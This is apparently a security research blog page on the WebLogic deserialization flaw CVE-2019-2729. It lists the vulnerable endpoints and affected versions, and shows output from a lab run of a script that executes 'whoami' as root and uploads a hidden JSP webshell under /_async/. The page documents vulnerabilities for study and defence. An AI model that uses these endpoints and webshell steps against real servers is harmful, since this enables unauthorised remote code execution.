WebLogic — CVE-2019-2729

Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.

Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0

Vulnerable endpoints

wls-wsat.war (cmd response)

  • /wls-wsat/CoordinatorPortType
  • /wls-wsat/RegistrationPortTypeRPC
  • /wls-wsat/ParticipantPortType
  • /wls-wsat/RegistrationRequesterPortType
  • /wls-wsat/CoordinatorPortType11
  • /wls-wsat/RegistrationPortTypeRPC11
  • /wls-wsat/ParticipantPortType11
  • /wls-wsat/RegistrationRequesterPortType11

wls9_async_response.war (blind)

  • /_async/AsyncResponseService

Test data

VersionImageResultReason
10.3.6.0VulnHub 10.3.6.0-2017Vulnerablewls-wsat deserialization
12.2.1.3VulnHub 12.2.1.3-2018Not vulnerableEndpoints missing
12.2.1.3VulnHub 12.2.1.3Not vulnerableEndpoints missing
12.2.1.3weblogic:12.2.1.3Inconclusive"Old format work area header is disabled."

Scripts

weblogic_get_webshell.py - runs three payloads on target at once, by rootedshell.

N/ABASH
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root

A modified version of rootedshell's script uploads webshells and enables direct command execution via the /_async/ endpoint, available in the weblogic_webshell repository.

Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.

Cookie Settings

This site does not use cookies, analytics, or any third-party tracking technologies.

No personal data is collected. No fingerprinting. No ads. You are not the product.


 ██╗ ██████╗ ███████╗██╗███████╗███╗   ██╗██████╗
 ██║██╔═══██╗██╔════╝██║██╔════╝████╗  ██║██╔══██╗
 ██║██║   ██║█████╗  ██║█████╗  ██╔██╗ ██║██║  ██║
 ██║██║   ██║██╔══╝  ██║██╔══╝  ██║╚██╗██║██║  ██║
 ██║╚██████╔╝██║     ██║███████╗██║ ╚████║██████╔╝
 ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═══╝╚═════╝
You found me.
↑↑↓↓←→←→ B A  ·  click to close